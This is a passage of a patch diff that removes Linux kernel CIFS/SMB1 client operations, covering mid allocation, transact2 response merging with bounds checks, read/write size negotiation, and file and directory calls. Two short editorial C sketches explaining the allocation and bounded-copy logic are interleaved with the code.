+-cifs_get_next_mid(struct TCP_Server_Info *server)
+-{
+-	__u64 mid = 0;
+-	__u16 last_mid, cur_mid;
+-	bool collision, reconnect = false;
+-
+-	spin_lock(&server->mid_lock);
+-
+-	/* mid is 16 bit only for CIFS/SMB */
+-	cur_mid = (__u16)((server->CurrentMid) & 0xffff);
+-	/* we do not want to loop forever */
+-	last_mid = cur_mid;
+-	cur_mid++;
+-	/* avoid 0xFFFF MID */
+-	if (cur_mid == 0xffff)
+-		cur_mid++;
+-
+-	/*
+-	 * This nested loop looks more expensive than it is.
+-	 * In practice the list of pending requests is short,
+-	 * fewer than 50, and the mids are likely to be unique
+-	 * on the first pass through the loop unless some request
+-	 * takes longer than the 64 thousand requests before it
+-	 * (and it would also have to have been a request that
+-	 * did not time out).
+-	 */
+-	while (cur_mid != last_mid) {
+-		struct mid_q_entry *mid_entry;
+-		unsigned int num_mids;
+-
+-		collision = false;
+-		if (cur_mid == 0)
+-			cur_mid++;
+-
+-		num_mids = 0;
+-		list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
+-			++num_mids;
+-			if (mid_entry->mid == cur_mid &&
+-			    mid_entry->mid_state == MID_REQUEST_SUBMITTED) {
+-				/* This mid is in use, try a different one */
+-				collision = true;
+-				break;
+-			}
+-		}
+-
+-		/*
+-		 * if we have more than 32k mids in the list, then something
+-		 * is very wrong. Possibly a local user is trying to DoS the
+-		 * box by issuing long-running calls and SIGKILL'ing them. If
+-		 * we get to 2^16 mids then we're in big trouble as this
+-		 * function could loop forever.
+-		 *
+-		 * Go ahead and assign out the mid in this situation, but force
+-		 * an eventual reconnect to clean out the pending_mid_q.
+-		 */
+-		if (num_mids > 32768)
+-			reconnect = true;
+-
+-		if (!collision) {
+-			mid = (__u64)cur_mid;
+-			server->CurrentMid = mid;
+-			break;
+-		}
+-		cur_mid++;
+-	}
+-	spin_unlock(&server->mid_lock);
+-
+-	if (reconnect) {
+-		cifs_signal_cifsd_for_reconnect(server, false);
+-	}
+-
+-	return mid;
+-}
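
[Editorial aside, not part of the patch: cifs_get_next_mid() above scans at most once around the 16-bit id space, skipping reserved values and detecting collisions against pending requests. A lock-free toy sketch of that wraparound allocation; in_use() here is a stand-in for scanning pending_mid_q.]

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

static bool in_use(uint16_t id)
{
	return id == 7; /* toy stand-in for a pending-request lookup */
}

/* Wrap once around the 16-bit space starting after *cursor, skipping
 * the reserved values 0 and 0xFFFF; return 0 when every id is taken. */
static uint16_t next_mid(uint16_t *cursor)
{
	uint16_t last = *cursor;

	for (uint16_t cur = last + 1; cur != last; cur++) {
		if (cur == 0 || cur == 0xFFFF)
			continue;
		if (!in_use(cur)) {
			*cursor = cur;
			return cur;
		}
	}
	return 0;
}

int main(void)
{
	uint16_t cursor = 6;

	printf("%u\n", next_mid(&cursor)); /* skips 7, prints 8 */
	return 0;
}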
+-
+-/*
+-	return codes:
+-		0	not a transact2, or all data present
+-		>0	transact2 with that much data missing
+-		-EINVAL	invalid transact2
+- */
+-static int
+-check2ndT2(char *buf)
+-{
+-	struct smb_hdr *pSMB = (struct smb_hdr *)buf;
+-	struct smb_t2_rsp *pSMBt;
+-	int remaining;
+-	__u16 total_data_size, data_in_this_rsp;
+-
+-	if (pSMB->Command != SMB_COM_TRANSACTION2)
+-		return 0;
+-
+-	/* check for plausible wct, bcc and t2 data and parm sizes */
+-	/* check for parm and data offset going beyond end of smb */
+-	if (pSMB->WordCount != 10) { /* coalesce_t2 depends on this */
+-		cifs_dbg(FYI, "Invalid transact2 word count\n");
+-		return -EINVAL;
+-	}
+-
+-	pSMBt = (struct smb_t2_rsp *)pSMB;
+-
+-	total_data_size = get_unaligned_le16(&pSMBt->t2_rsp.TotalDataCount);
+-	data_in_this_rsp = get_unaligned_le16(&pSMBt->t2_rsp.DataCount);
+-
+-	if (total_data_size == data_in_this_rsp)
+-		return 0;
+-	else if (total_data_size < data_in_this_rsp) {
+-		cifs_dbg(FYI, "total data %d smaller than data in frame %d\n",
+-			 total_data_size, data_in_this_rsp);
+-		return -EINVAL;
+-	}
+-
+-	remaining = total_data_size - data_in_this_rsp;
+-
+-	cifs_dbg(FYI, "missing %d bytes from transact2, check next response\n",
+-		 remaining);
+-	if (total_data_size > CIFSMaxBufSize) {
+-		cifs_dbg(VFS, "TotalDataSize %d is over maximum buffer %d\n",
+-			 total_data_size, CIFSMaxBufSize);
+-		return -EINVAL;
+-	}
+-	return remaining;
+-}
+-
+-static int
+-coalesce_t2(char *second_buf, struct smb_hdr *target_hdr)
+-{
+-	struct smb_t2_rsp *pSMBs = (struct smb_t2_rsp *)second_buf;
+-	struct smb_t2_rsp *pSMBt  = (struct smb_t2_rsp *)target_hdr;
+-	char *data_area_of_tgt;
+-	char *data_area_of_src;
+-	int remaining;
+-	unsigned int byte_count, total_in_tgt;
+-	__u16 tgt_total_cnt, src_total_cnt, total_in_src;
+-
+-	src_total_cnt = get_unaligned_le16(&pSMBs->t2_rsp.TotalDataCount);
+-	tgt_total_cnt = get_unaligned_le16(&pSMBt->t2_rsp.TotalDataCount);
+-
+-	if (tgt_total_cnt != src_total_cnt)
+-		cifs_dbg(FYI, "total data count of primary and secondary t2 differ source=%hu target=%hu\n",
+-			 src_total_cnt, tgt_total_cnt);
+-
+-	total_in_tgt = get_unaligned_le16(&pSMBt->t2_rsp.DataCount);
+-
+-	remaining = tgt_total_cnt - total_in_tgt;
+-
+-	if (remaining < 0) {
+-		cifs_dbg(FYI, "Server sent too much data. tgt_total_cnt=%hu total_in_tgt=%u\n",
+-			 tgt_total_cnt, total_in_tgt);
+-		return -EPROTO;
+-	}
+-
+-	if (remaining == 0) {
+-		/* nothing to do, ignore */
+-		cifs_dbg(FYI, "no more data remains\n");
+-		return 0;
+-	}
+-
+-	total_in_src = get_unaligned_le16(&pSMBs->t2_rsp.DataCount);
+-	if (remaining < total_in_src)
+-		cifs_dbg(FYI, "transact2 2nd response contains too much data\n");
+-
+-	/* find end of first SMB data area */
+-	data_area_of_tgt = (char *)&pSMBt->hdr.Protocol +
+-				get_unaligned_le16(&pSMBt->t2_rsp.DataOffset);
+-
+-	/* validate target area */
+-	data_area_of_src = (char *)&pSMBs->hdr.Protocol +
+-				get_unaligned_le16(&pSMBs->t2_rsp.DataOffset);
+-
+-	data_area_of_tgt += total_in_tgt;
+-
+-	total_in_tgt += total_in_src;
+-	/* is the result too big for the field? */
+-	if (total_in_tgt > USHRT_MAX) {
+-		cifs_dbg(FYI, "coalesced DataCount too large (%u)\n",
+-			 total_in_tgt);
+-		return -EPROTO;
+-	}
+-	put_unaligned_le16(total_in_tgt, &pSMBt->t2_rsp.DataCount);
+-
+-	/* fix up the BCC */
+-	byte_count = get_bcc(target_hdr);
+-	byte_count += total_in_src;
+-	/* is the result too big for the field? */
+-	if (byte_count > USHRT_MAX) {
+-		cifs_dbg(FYI, "coalesced BCC too large (%u)\n", byte_count);
+-		return -EPROTO;
+-	}
+-	put_bcc(byte_count, target_hdr);
+-
+-	byte_count = be32_to_cpu(target_hdr->smb_buf_length);
+-	byte_count += total_in_src;
+-	/* don't allow buffer to overflow */
+-	if (byte_count > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
+-		cifs_dbg(FYI, "coalesced BCC exceeds buffer size (%u)\n",
+-			 byte_count);
+-		return -ENOBUFS;
+-	}
+-	target_hdr->smb_buf_length = cpu_to_be32(byte_count);
+-
+-	/* copy second buffer into end of first buffer */
+-	memcpy(data_area_of_tgt, data_area_of_src, total_in_src);
+-
+-	if (remaining != total_in_src) {
+-		/* more responses to go */
+-		cifs_dbg(FYI, "waiting for more secondary responses\n");
+-		return 1;
+-	}
+-
+-	/* we are done */
+-	cifs_dbg(FYI, "found the last secondary response\n");
+-	return 0;
+-}
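
[Editorial aside, not part of the patch: before merging a secondary response, coalesce_t2() above checks both that the 16-bit on-wire count will not truncate and that the backing allocation will not overrun. A minimal sketch of that double-bounded append; the limits here are illustrative.]

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static int append_bounded(uint8_t *buf, uint32_t cap, uint16_t *fill,
			  const uint8_t *src, uint16_t n)
{
	uint32_t total = (uint32_t)*fill + n;

	if (total > UINT16_MAX)
		return -EPROTO;  /* 16-bit count would truncate */
	if (total > cap)
		return -ENOBUFS; /* backing buffer would overrun */
	memcpy(buf + *fill, src, n);
	*fill = (uint16_t)total;
	return 0;
}

int main(void)
{
	uint8_t buf[8];
	uint16_t fill = 0;

	printf("%d\n", append_bounded(buf, sizeof(buf), &fill,
				      (const uint8_t *)"abcd", 4));
	printf("%d\n", append_bounded(buf, sizeof(buf), &fill,
				      (const uint8_t *)"efghi", 5)); /* -ENOBUFS */
	return 0;
}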
+-
+-static void
+-cifs_downgrade_oplock(struct TCP_Server_Info *server,
+-		      struct cifsInodeInfo *cinode, __u32 oplock,
+-		      unsigned int epoch, bool *purge_cache)
+-{
+-	cifs_set_oplock_level(cinode, oplock);
+-}
+-
+-static bool
+-cifs_check_trans2(struct mid_q_entry *mid, struct TCP_Server_Info *server,
+-		  char *buf, int malformed)
+-{
+-	if (malformed)
+-		return false;
+-	if (check2ndT2(buf) <= 0)
+-		return false;
+-	mid->multiRsp = true;
+-	if (mid->resp_buf) {
+-		/* merge response - fix up 1st*/
+-		malformed = coalesce_t2(buf, mid->resp_buf);
+-		if (malformed > 0)
+-			return true;
+-		/* All parts received or packet is malformed. */
+-		mid->multiEnd = true;
+-		dequeue_mid(mid, malformed);
+-		return true;
+-	}
+-	if (!server->large_buf) {
+-		/*FIXME: switch to already allocated largebuf?*/
+-		cifs_dbg(VFS, "1st trans2 resp needs bigbuf\n");
+-	} else {
+-		/* Have first buffer */
+-		mid->resp_buf = buf;
+-		mid->large_buf = true;
+-		server->bigbuf = NULL;
+-	}
+-	return true;
+-}
+-
+-static bool
+-cifs_need_neg(struct TCP_Server_Info *server)
+-{
+-	return server->maxBuf == 0;
+-}
+-
+-static int
+-cifs_negotiate(const unsigned int xid,
+-	       struct cifs_ses *ses,
+-	       struct TCP_Server_Info *server)
+-{
+-	int rc;
+-	rc = CIFSSMBNegotiate(xid, ses, server);
+-	if (rc == -EAGAIN) {
+-		/* retry only once on 1st time connection */
+-		set_credits(server, 1);
+-		rc = CIFSSMBNegotiate(xid, ses, server);
+-		if (rc == -EAGAIN)
+-			rc = -EHOSTDOWN;
+-	}
+-	return rc;
+-}
+-
+-static unsigned int
+-cifs_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	__u64 unix_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int wsize;
+-
+-	/* start with specified wsize, or default */
+-	if (ctx->wsize)
+-		wsize = ctx->wsize;
+-	else if (tcon->unix_ext && (unix_cap & CIFS_UNIX_LARGE_WRITE_CAP))
+-		wsize = CIFS_DEFAULT_IOSIZE;
+-	else
+-		wsize = CIFS_DEFAULT_NON_POSIX_WSIZE;
+-
+-	/* can server support 24-bit write sizes? (via UNIX extensions) */
+-	if (!tcon->unix_ext || !(unix_cap & CIFS_UNIX_LARGE_WRITE_CAP))
+-		wsize = min_t(unsigned int, wsize, CIFS_MAX_RFC1002_WSIZE);
+-
+-	/*
+-	 * no CAP_LARGE_WRITE_X or is signing enabled without CAP_UNIX set?
+-	 * Limit it to max buffer offered by the server, minus the size of the
+-	 * WRITEX header, not including the 4 byte RFC1001 length.
+-	 */
+-	if (!(server->capabilities & CAP_LARGE_WRITE_X) ||
+-	    (!(server->capabilities & CAP_UNIX) && server->sign))
+-		wsize = min_t(unsigned int, wsize,
+-				server->maxBuf - sizeof(WRITE_REQ) + 4);
+-
+-	/* hard limit of CIFS_MAX_WSIZE */
+-	wsize = min_t(unsigned int, wsize, CIFS_MAX_WSIZE);
+-
+-	return wsize;
+-}
+-
+-static unsigned int
+-cifs_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	__u64 unix_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int rsize, defsize;
+-
+-	/*
+-	 * Set default value...
+-	 *
+-	 * HACK alert! Ancient servers have very small buffers. Even though
+-	 * MS-CIFS indicates that servers are only limited by the client's
+-	 * bufsize for reads, testing against win98se shows that it throws
+-	 * INVALID_PARAMETER errors if you try to request too large a read.
+-	 * OS/2 just sends back short reads.
+-	 *
+-	 * If the server doesn't advertise CAP_LARGE_READ_X, then assume that
+-	 * it can't handle a read request larger than its MaxBufferSize either.
+-	 */
+-	if (tcon->unix_ext && (unix_cap & CIFS_UNIX_LARGE_READ_CAP))
+-		defsize = CIFS_DEFAULT_IOSIZE;
+-	else if (server->capabilities & CAP_LARGE_READ_X)
+-		defsize = CIFS_DEFAULT_NON_POSIX_RSIZE;
+-	else
+-		defsize = server->maxBuf - sizeof(READ_RSP);
+-
+-	rsize = ctx->rsize ? ctx->rsize : defsize;
+-
+-	/*
+-	 * no CAP_LARGE_READ_X? Then MS-CIFS states that we must limit this to
+-	 * the client's MaxBufferSize.
+-	 */
+-	if (!(server->capabilities & CAP_LARGE_READ_X))
+-		rsize = min_t(unsigned int, CIFSMaxBufSize, rsize);
+-
+-	/* hard limit of CIFS_MAX_RSIZE */
+-	rsize = min_t(unsigned int, rsize, CIFS_MAX_RSIZE);
+-
+-	return rsize;
+-}
+-
+-static void
+-cifs_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+-	      struct cifs_sb_info *cifs_sb)
+-{
+-	CIFSSMBQFSDeviceInfo(xid, tcon);
+-	CIFSSMBQFSAttributeInfo(xid, tcon);
+-}
+-
+-static int
+-cifs_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct cifs_sb_info *cifs_sb, const char *full_path)
+-{
+-	int rc;
+-	FILE_ALL_INFO *file_info;
+-
+-	file_info = kmalloc(sizeof(FILE_ALL_INFO), GFP_KERNEL);
+-	if (file_info == NULL)
+-		return -ENOMEM;
+-
+-	rc = CIFSSMBQPathInfo(xid, tcon, full_path, file_info,
+-			      0 /* not legacy */, cifs_sb->local_nls,
+-			      cifs_remap(cifs_sb));
+-
+-	if (rc == -EOPNOTSUPP || rc == -EINVAL)
+-		rc = SMBQueryInformation(xid, tcon, full_path, file_info,
+-				cifs_sb->local_nls, cifs_remap(cifs_sb));
+-	kfree(file_info);
+-	return rc;
+-}
+-
+-static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifs_sb_info *cifs_sb, const char *full_path,
+-				struct cifs_open_info_data *data, bool *adjustTZ, bool *symlink)
+-{
+-	int rc;
+-	FILE_ALL_INFO fi = {};
+-
+-	*symlink = false;
+-
+-	/* could do find first instead but this returns more info */
+-	rc = CIFSSMBQPathInfo(xid, tcon, full_path, &fi, 0 /* not legacy */, cifs_sb->local_nls,
+-			      cifs_remap(cifs_sb));
+-	/*
+-	 * BB optimize code so we do not make the above call when server claims
+-	 * no NT SMB support and the above call failed at least once - set flag
+-	 * in tcon or mount.
+-	 */
+-	if ((rc == -EOPNOTSUPP) || (rc == -EINVAL)) {
+-		rc = SMBQueryInformation(xid, tcon, full_path, &fi, cifs_sb->local_nls,
+-					 cifs_remap(cifs_sb));
+-		*adjustTZ = true;
+-	}
+-
+-	if (!rc) {
+-		int tmprc;
+-		int oplock = 0;
+-		struct cifs_fid fid;
+-		struct cifs_open_parms oparms;
+-
+-		move_cifs_info_to_smb2(&data->fi, &fi);
+-
+-		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
+-			return 0;
+-
+-		oparms = (struct cifs_open_parms) {
+-			.tcon = tcon,
+-			.cifs_sb = cifs_sb,
+-			.desired_access = FILE_READ_ATTRIBUTES,
+-			.create_options = cifs_create_options(cifs_sb, 0),
+-			.disposition = FILE_OPEN,
+-			.path = full_path,
+-			.fid = &fid,
+-		};
+-
+-		/* Need to check if this is a symbolic link or not */
+-		tmprc = CIFS_open(xid, &oparms, &oplock, NULL);
+-		if (tmprc == -EOPNOTSUPP)
+-			*symlink = true;
+-		else if (tmprc == 0)
+-			CIFSSMBClose(xid, tcon, fid.netfid);
+-	}
+-
+-	return rc;
+-}
+-
+-static int cifs_get_srv_inum(const unsigned int xid, struct cifs_tcon *tcon,
+-			     struct cifs_sb_info *cifs_sb, const char *full_path,
+-			     u64 *uniqueid, struct cifs_open_info_data *unused)
+-{
+-	/*
+-	 * We can not use the IndexNumber field by default from Windows or
+-	 * Samba (in ALL_INFO buf) but we can request it explicitly. The SNIA
+-	 * CIFS spec claims that this value is unique within the scope of a
+-	 * share, and the windows docs hint that it's actually unique
+-	 * per-machine.
+-	 *
+-	 * There may be higher info levels that work but are there Windows
+-	 * server or network appliances for which IndexNumber field is not
+-	 * guaranteed unique?
+-	 */
+-	return CIFSGetSrvInodeNumber(xid, tcon, full_path, uniqueid,
+-				     cifs_sb->local_nls,
+-				     cifs_remap(cifs_sb));
+-}
+-
+-static int cifs_query_file_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifsFileInfo *cfile, struct cifs_open_info_data *data)
+-{
+-	int rc;
+-	FILE_ALL_INFO fi = {};
+-
+-	if (cfile->symlink_target) {
+-		data->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-		if (!data->symlink_target)
+-			return -ENOMEM;
+-	}
+-
+-	rc = CIFSSMBQFileInfo(xid, tcon, cfile->fid.netfid, &fi);
+-	if (!rc)
+-		move_cifs_info_to_smb2(&data->fi, &fi);
+-	return rc;
+-}
+-
+-static void
+-cifs_clear_stats(struct cifs_tcon *tcon)
+-{
+-	atomic_set(&tcon->stats.cifs_stats.num_writes, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_reads, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_flushes, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_oplock_brks, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_opens, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_posixopens, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_posixmkdirs, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_closes, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_deletes, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_mkdirs, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_rmdirs, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_renames, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_t2renames, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_ffirst, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_fnext, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_fclose, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_hardlinks, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_symlinks, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_locks, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_acl_get, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_acl_set, 0);
+-}
+-
+-static void
+-cifs_print_stats(struct seq_file *m, struct cifs_tcon *tcon)
+-{
+-	seq_printf(m, " Oplocks breaks: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_oplock_brks));
+-	seq_printf(m, "\nReads:  %d Bytes: %llu",
+-		   atomic_read(&tcon->stats.cifs_stats.num_reads),
+-		   (long long)(tcon->bytes_read));
+-	seq_printf(m, "\nWrites: %d Bytes: %llu",
+-		   atomic_read(&tcon->stats.cifs_stats.num_writes),
+-		   (long long)(tcon->bytes_written));
+-	seq_printf(m, "\nFlushes: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_flushes));
+-	seq_printf(m, "\nLocks: %d HardLinks: %d Symlinks: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_locks),
+-		   atomic_read(&tcon->stats.cifs_stats.num_hardlinks),
+-		   atomic_read(&tcon->stats.cifs_stats.num_symlinks));
+-	seq_printf(m, "\nOpens: %d Closes: %d Deletes: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_opens),
+-		   atomic_read(&tcon->stats.cifs_stats.num_closes),
+-		   atomic_read(&tcon->stats.cifs_stats.num_deletes));
+-	seq_printf(m, "\nPosix Opens: %d Posix Mkdirs: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_posixopens),
+-		   atomic_read(&tcon->stats.cifs_stats.num_posixmkdirs));
+-	seq_printf(m, "\nMkdirs: %d Rmdirs: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_mkdirs),
+-		   atomic_read(&tcon->stats.cifs_stats.num_rmdirs));
+-	seq_printf(m, "\nRenames: %d T2 Renames %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_renames),
+-		   atomic_read(&tcon->stats.cifs_stats.num_t2renames));
+-	seq_printf(m, "\nFindFirst: %d FNext %d FClose %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_ffirst),
+-		   atomic_read(&tcon->stats.cifs_stats.num_fnext),
+-		   atomic_read(&tcon->stats.cifs_stats.num_fclose));
+-}
+-
+-static void
+-cifs_mkdir_setinfo(struct inode *inode, const char *full_path,
+-		   struct cifs_sb_info *cifs_sb, struct cifs_tcon *tcon,
+-		   const unsigned int xid)
+-{
+-	FILE_BASIC_INFO info;
+-	struct cifsInodeInfo *cifsInode;
+-	u32 dosattrs;
+-	int rc;
+-
+-	memset(&info, 0, sizeof(info));
+-	cifsInode = CIFS_I(inode);
+-	dosattrs = cifsInode->cifsAttrs|ATTR_READONLY;
+-	info.Attributes = cpu_to_le32(dosattrs);
+-	rc = CIFSSMBSetPathInfo(xid, tcon, full_path, &info, cifs_sb->local_nls,
+-				cifs_sb);
+-	if (rc == 0)
+-		cifsInode->cifsAttrs = dosattrs;
+-}
+-
+-static int cifs_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
+-			  void *buf)
+-{
+-	struct cifs_open_info_data *data = buf;
+-	FILE_ALL_INFO fi = {};
+-	int rc;
+-
+-	if (!(oparms->tcon->ses->capabilities & CAP_NT_SMBS))
+-		rc = SMBLegacyOpen(xid, oparms->tcon, oparms->path,
+-				   oparms->disposition,
+-				   oparms->desired_access,
+-				   oparms->create_options,
+-				   &oparms->fid->netfid, oplock, &fi,
+-				   oparms->cifs_sb->local_nls,
+-				   cifs_remap(oparms->cifs_sb));
+-	else
+-		rc = CIFS_open(xid, oparms, oplock, &fi);
+-
+-	if (!rc && data)
+-		move_cifs_info_to_smb2(&data->fi, &fi);
+-
+-	return rc;
+-}
+-
+-static void
+-cifs_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	cfile->fid.netfid = fid->netfid;
+-	cifs_set_oplock_level(cinode, oplock);
+-	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
+-}
+-
+-static void
+-cifs_close_file(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifs_fid *fid)
+-{
+-	CIFSSMBClose(xid, tcon, fid->netfid);
+-}
+-
+-static int
+-cifs_flush_file(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifs_fid *fid)
+-{
+-	return CIFSSMBFlush(xid, tcon, fid->netfid);
+-}
+-
+-static int
+-cifs_sync_read(const unsigned int xid, struct cifs_fid *pfid,
+-	       struct cifs_io_parms *parms, unsigned int *bytes_read,
+-	       char **buf, int *buf_type)
+-{
+-	parms->netfid = pfid->netfid;
+-	return CIFSSMBRead(xid, parms, bytes_read, buf, buf_type);
+-}
+-
+-static int
+-cifs_sync_write(const unsigned int xid, struct cifs_fid *pfid,
+-		struct cifs_io_parms *parms, unsigned int *written,
+-		struct kvec *iov, unsigned long nr_segs)
+-{
+-
+-	parms->netfid = pfid->netfid;
+-	return CIFSSMBWrite2(xid, parms, written, iov, nr_segs);
+-}
+-
+-static int
+-smb_set_file_info(struct inode *inode, const char *full_path,
+-		  FILE_BASIC_INFO *buf, const unsigned int xid)
+-{
+-	int oplock = 0;
+-	int rc;
+-	__u32 netpid;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifsFileInfo *open_file;
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = NULL;
+-	struct cifs_tcon *tcon;
+-
+-	/* if the file is already open for write, just use that fileid */
+-	open_file = find_writable_file(cinode, FIND_WR_FSUID_ONLY);
+-	if (open_file) {
+-		fid.netfid = open_file->fid.netfid;
+-		netpid = open_file->pid;
+-		tcon = tlink_tcon(open_file->tlink);
+-		goto set_via_filehandle;
+-	}
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		tlink = NULL;
+-		goto out;
+-	}
+-	tcon = tlink_tcon(tlink);
+-
+-	rc = CIFSSMBSetPathInfo(xid, tcon, full_path, buf, cifs_sb->local_nls,
+-				cifs_sb);
+-	if (rc == 0) {
+-		cinode->cifsAttrs = le32_to_cpu(buf->Attributes);
+-		goto out;
+-	} else if (rc != -EOPNOTSUPP && rc != -EINVAL) {
+-		goto out;
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	cifs_dbg(FYI, "calling SetFileInfo since SetPathInfo for times not supported by this server\n");
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc != 0) {
+-		if (rc == -EIO)
+-			rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	netpid = current->tgid;
+-
+-set_via_filehandle:
+-	rc = CIFSSMBSetFileInfo(xid, tcon, buf, fid.netfid, netpid);
+-	if (!rc)
+-		cinode->cifsAttrs = le32_to_cpu(buf->Attributes);
+-
+-	if (open_file == NULL)
+-		CIFSSMBClose(xid, tcon, fid.netfid);
+-	else
+-		cifsFileInfo_put(open_file);
+-out:
+-	if (tlink != NULL)
+-		cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static int
+-cifs_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile)
+-{
+-	return CIFSSMB_set_compression(xid, tcon, cfile->fid.netfid);
+-}
+-
+-static int
+-cifs_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const char *path, struct cifs_sb_info *cifs_sb,
+-		     struct cifs_fid *fid, __u16 search_flags,
+-		     struct cifs_search_info *srch_inf)
+-{
+-	int rc;
+-
+-	rc = CIFSFindFirst(xid, tcon, path, cifs_sb,
+-			   &fid->netfid, search_flags, srch_inf, true);
+-	if (rc)
+-		cifs_dbg(FYI, "find first failed=%d\n", rc);
+-	return rc;
+-}
+-
+-static int
+-cifs_query_dir_next(const unsigned int xid, struct cifs_tcon *tcon,
+-		    struct cifs_fid *fid, __u16 search_flags,
+-		    struct cifs_search_info *srch_inf)
+-{
+-	return CIFSFindNext(xid, tcon, fid->netfid, search_flags, srch_inf);
+-}
+-
+-static int
+-cifs_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
+-	       struct cifs_fid *fid)
+-{
+-	return CIFSFindClose(xid, tcon, fid->netfid);
+-}
+-
+-static int
+-cifs_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
+-		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
+-{
+-	return CIFSSMBLock(0, tcon, net_fid, current->tgid, 0, 0, 0, 0,
+-			   LOCKING_ANDX_OPLOCK_RELEASE, false, CIFS_CACHE_READ(cinode) ? 1 : 0);
+-}
+-
+-static int
+-cifs_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+-	     struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
+-{
+-	int rc = -EOPNOTSUPP;
+-
+-	buf->f_type = CIFS_SUPER_MAGIC;
+-
+-	/*
+-	 * We could add a second check for a QFS Unix capability bit
+-	 */
+-	if ((tcon->ses->capabilities & CAP_UNIX) &&
+-	    (CIFS_POSIX_EXTENSIONS & le64_to_cpu(tcon->fsUnixInfo.Capability)))
+-		rc = CIFSSMBQFSPosixInfo(xid, tcon, buf);
+-
+-	/*
+-	 * Only need to call the old QFSInfo if failed on newer one,
+-	 * e.g. by OS/2.
+-	 **/
+-	if (rc && (tcon->ses->capabilities & CAP_NT_SMBS))
+-		rc = CIFSSMBQFSInfo(xid, tcon, buf);
+-
+-	/*
+-	 * Some old Windows servers also do not support level 103, retry with
+-	 * older level one if old server failed the previous call or we
+-	 * bypassed it because we detected that this was an older LANMAN sess
+-	 */
+-	if (rc)
+-		rc = SMBOldQFSInfo(xid, tcon, buf);
+-	return rc;
+-}
+-
+-static int
+-cifs_mand_lock(const unsigned int xid, struct cifsFileInfo *cfile, __u64 offset,
+-	       __u64 length, __u32 type, int lock, int unlock, bool wait)
+-{
+-	return CIFSSMBLock(xid, tlink_tcon(cfile->tlink), cfile->fid.netfid,
+-			   current->tgid, length, offset, unlock, lock,
+-			   (__u8)type, wait, 0);
+-}
+-
+-static int
+-cifs_unix_dfs_readlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const unsigned char *searchName, char **symlinkinfo,
+-		       const struct nls_table *nls_codepage)
+-{
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	int rc;
